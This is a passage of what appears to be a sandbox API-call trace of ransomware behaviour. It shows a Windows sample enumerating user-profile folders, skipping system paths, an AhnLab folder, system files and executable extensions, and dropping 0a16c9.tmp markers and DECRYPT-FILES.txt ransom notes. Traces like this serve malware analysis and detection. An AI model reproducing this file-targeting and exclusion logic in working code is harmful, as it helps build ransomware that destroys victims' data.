lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0186.162] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\0a16c9.tmp" [0186.162] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.163] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.163] CloseHandle (hObject=0x0) returned 0 [0186.163] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.163] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb012e180, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb012e180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb012e180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.163] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.163] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.163] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.163] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.163] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.163] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.163] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0186.163] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0186.163] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="autorun.inf") returned 1 [0186.163] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="boot.ini") returned 1 [0186.163] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="desktop.ini") returned 1 [0186.163] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat") returned -1 [0186.163] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="iconcache.db") returned -1 [0186.164] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="bootsect.bak") returned 1 [0186.164] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat.log") returned -1 [0186.164] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="thumbs.db") returned -1 [0186.164] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Bootfont.bin") returned 1 [0186.164] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0186.164] lstrcmpiW (lpString1="search-ms", lpString2="lnk") returned 1 [0186.164] lstrcmpiW (lpString1="search-ms", lpString2="exe") returned 1 [0186.164] lstrcmpiW (lpString1="search-ms", lpString2="sys") returned -1 [0186.164] lstrcmpiW (lpString1="search-ms", lpString2="dll") returned 1 [0186.164] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0186.164] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0186.164] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0186.164] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="Everywhere.search-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" [0186.164] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.164] CloseHandle (hObject=0x0) returned 0 [0186.164] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.164] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0186.165] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0186.165] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="autorun.inf") returned 1 [0186.165] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="boot.ini") returned 1 [0186.165] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="desktop.ini") returned 1 [0186.165] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat") returned -1 [0186.165] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="iconcache.db") returned 1 [0186.165] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="bootsect.bak") returned 1 [0186.165] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat.log") returned -1 [0186.165] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="thumbs.db") returned -1 [0186.165] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Bootfont.bin") returned 1 [0186.165] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0186.165] lstrcmpiW (lpString1="search-ms", lpString2="lnk") returned 1 [0186.165] lstrcmpiW (lpString1="search-ms", lpString2="exe") returned 1 [0186.165] lstrcmpiW (lpString1="search-ms", lpString2="sys") returned -1 [0186.165] lstrcmpiW (lpString1="search-ms", lpString2="dll") returned 1 [0186.165] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 39 [0186.165] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0186.165] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0186.165] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="Indexed Locations.search-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" [0186.165] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.165] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.165] CloseHandle (hObject=0x0) returned 0 [0186.165] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.166] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0186.166] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.166] CloseHandle (hObject=0x254) returned 1 [0186.166] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0186.166] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0186.166] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0186.166] lstrcatW (in: lpString1="SendTo", lpString2="\\" | out: lpString1="SendTo\\") returned="SendTo\\" [0186.166] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\Program Files") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch=":\\Windows") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\Games\\") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\All Users") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="AhnLab") returned 0x0 [0186.166] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.166] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned 37 [0186.166] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.166] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\\\0a16c9.tmp") returned 48 [0186.166] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.167] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned 37 [0186.167] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.167] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\\\DECRYPT-FILES.txt") returned 55 [0186.167] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.167] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned 37 [0186.167] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*" [0186.167] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.167] CloseHandle (hObject=0x254) returned 1 [0186.167] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0186.167] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0186.167] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0186.167] lstrcatW (in: lpString1="Start Menu", lpString2="\\" | out: lpString1="Start Menu\\") returned="Start Menu\\" [0186.167] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Start Menu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" [0186.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\Program Files") returned 0x0 [0186.167] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch=":\\Windows") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\Games\\") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\All Users") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="AhnLab") returned 0x0 [0186.168] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.168] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned 41 [0186.168] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.168] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\\\0a16c9.tmp") returned 52 [0186.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.168] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned 41 [0186.168] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.168] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\\\DECRYPT-FILES.txt") returned 59 [0186.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.168] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned 41 [0186.168] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*" [0186.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.169] CloseHandle (hObject=0x254) returned 1 [0186.169] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0186.169] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0186.169] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0186.169] lstrcatW (in: lpString1="Templates", lpString2="\\" | out: lpString1="Templates\\") returned="Templates\\" [0186.169] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\Program Files") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch=":\\Windows") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\Games\\") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\All Users") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="AhnLab") returned 0x0 [0186.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.169] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned 40 [0186.169] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.169] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\\\0a16c9.tmp") returned 51 [0186.169] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned 40 [0186.170] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.170] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\\\DECRYPT-FILES.txt") returned 58 [0186.170] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned 40 [0186.170] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*" [0186.170] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.170] CloseHandle (hObject=0x254) returned 1 [0186.170] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf126daa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf126daa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0186.170] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0186.170] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 